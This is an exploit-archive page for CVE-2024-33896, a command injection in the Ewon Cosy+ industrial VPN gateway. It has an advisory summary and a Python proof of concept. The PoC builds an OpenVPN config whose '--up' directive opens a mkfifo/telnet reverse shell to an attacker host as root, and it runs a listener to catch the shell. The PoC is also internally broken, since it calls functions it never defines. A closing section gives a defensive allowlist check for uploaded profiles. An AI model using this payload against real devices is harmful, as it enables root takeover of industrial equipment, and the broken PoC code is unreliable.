## https://sploitus.com/exploit?id=PACKETSTORM:190394
Hey,
    
    Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
    maintenance in industrial environments. The manufacturer describes the
    product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
    VPN connection between the machine (PLC, HMI, or other devices) and the
    remote engineer. The connection happens through Talk2m, a highly secured
    industrial cloud service. The Ewon Cosy+ makes industrial remote access
    easy and secure like never before!" Due to improper neutralization of
    parameters read from a user-controlled configuration file, an authenticated
    attacker is able to inject and execute OS commands on the device.
    
    Vulnerability Details: Authenticated attackers are able to upload a custom
    OpenVPN configuration. This configuration can contain the OpenVPN
    parameters "--up" and "--down", which execute a specified script or
    executable. Since the OpenVPN process itself runs with the highest
    privileges (root), this allows the device to be completely compromised.
    
    
    PoC:
    # Exploit Title: Ewon Cosy+ Command Injection
    # Google Dork: N/A
    # Date: 2024-8-20
    # Exploit Author: CodeB0ss
    # Contact: t.me/codeb0ss / uncodeboss@gmail.com
    # Version: 21.2s7
    # Tested on: Windows 11 Home Edition
    # CVE: CVE-2024-33896
    
    
    import socket
    import subprocess
    import time
    
    def configcreator(file_path):
        with open(file_path, 'w') as f:
            f.write( """ client dev tun persist-tun
    proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
    $TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """)

    def l3st(port):
        server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server_socket.bind(('0.0.0.0', port))
        server_socket.listen(1)
        print(f" - --> Listening_0n_port {port}")
        client_socket, _ = server_socket.accept()
        print(" - --> Recevied")
        while True:
            data = client_socket.recv(1024)
            if not data:
                break
            print(data.decode())
        client_socket.close()
        server_socket.close()

    if __name__ == "__main__":
        IP = '127.0.0.1'
        config = '/path/to/malicious_config.ovpn'
        port = 5000
        listener_process = subprocess.Popen(['python', '-c', f'from main import start_listener; start_listener({port})'])
        time.sleep(2)
        create_malicious_openvpn_config(config)
        print(f" - --> config_created {config}")
    
    
    GitHub:
    https://github.com/codeb0ss/CVE-2024-33896-PoC
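
Mitigation sketch for the root cause described under "Vulnerability Details": an upload-side check that accepts an OpenVPN profile only if every directive is on an allowlist, so "--up", "--down" and "script-security" never reach the root-owned process. This is an added example, not code from the advisory, the PoC author or the vendor; the `ALLOWED` and `INLINE_ALLOWED` sets, the function name `validate_ovpn` and the sample config are assumptions made for illustration, and the check goes beyond the two parameters named above by rejecting anything not explicitly allowed.

```python
import shlex

# Assumption: directives a remote-access client profile needs; tune per deployment.
ALLOWED = {"client", "dev", "proto", "remote", "nobind", "persist-tun",
           "persist-key", "verb", "mute", "cipher", "auth",
           "remote-cert-tls", "resolv-retry"}
INLINE_ALLOWED = {"ca", "cert", "key", "tls-auth", "tls-crypt"}

def validate_ovpn(text):
    """Return [(line_no, directive)] for every line outside the allowlist."""
    rejected, inline, no = [], None, 0
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if inline:                          # inside <ca>...</ca> and similar
            if line.startswith(f"</{inline}>"):
                inline = None
            continue
        if not line or line[0] in "#;":     # blank line or comment
            continue
        if line.startswith("<") and line.endswith(">"):
            if line[1:-1] in INLINE_ALLOWED:
                inline = line[1:-1]
            else:
                rejected.append((no, line))
            continue
        try:
            name = shlex.split(line)[0]     # strip quoting around the name
        except ValueError:                  # unbalanced quotes: refuse the line
            rejected.append((no, line))
            continue
        if name.startswith("--"):           # the page's config spells it "--up"
            name = name[2:]
        if name not in ALLOWED:
            rejected.append((no, name))
    if inline:                              # unterminated inline block
        rejected.append((no, f"<{inline}> not closed"))
    return rejected

# Constructed sample: same shape as the config on the page, harmless script path.
SAMPLE = """client
dev tun
persist-tun
proto tcp
verb 5
mute 20
--up '/tmp/example.sh'
script-security 2
"""

if __name__ == "__main__":
    for no, name in validate_ovpn(SAMPLE):
        print(f"line {no}: rejected directive {name!r}")
```

An allowlist is used rather than a denylist of script options because OpenVPN has several other directives that run external programs, and a denylist has to track all of them across versions.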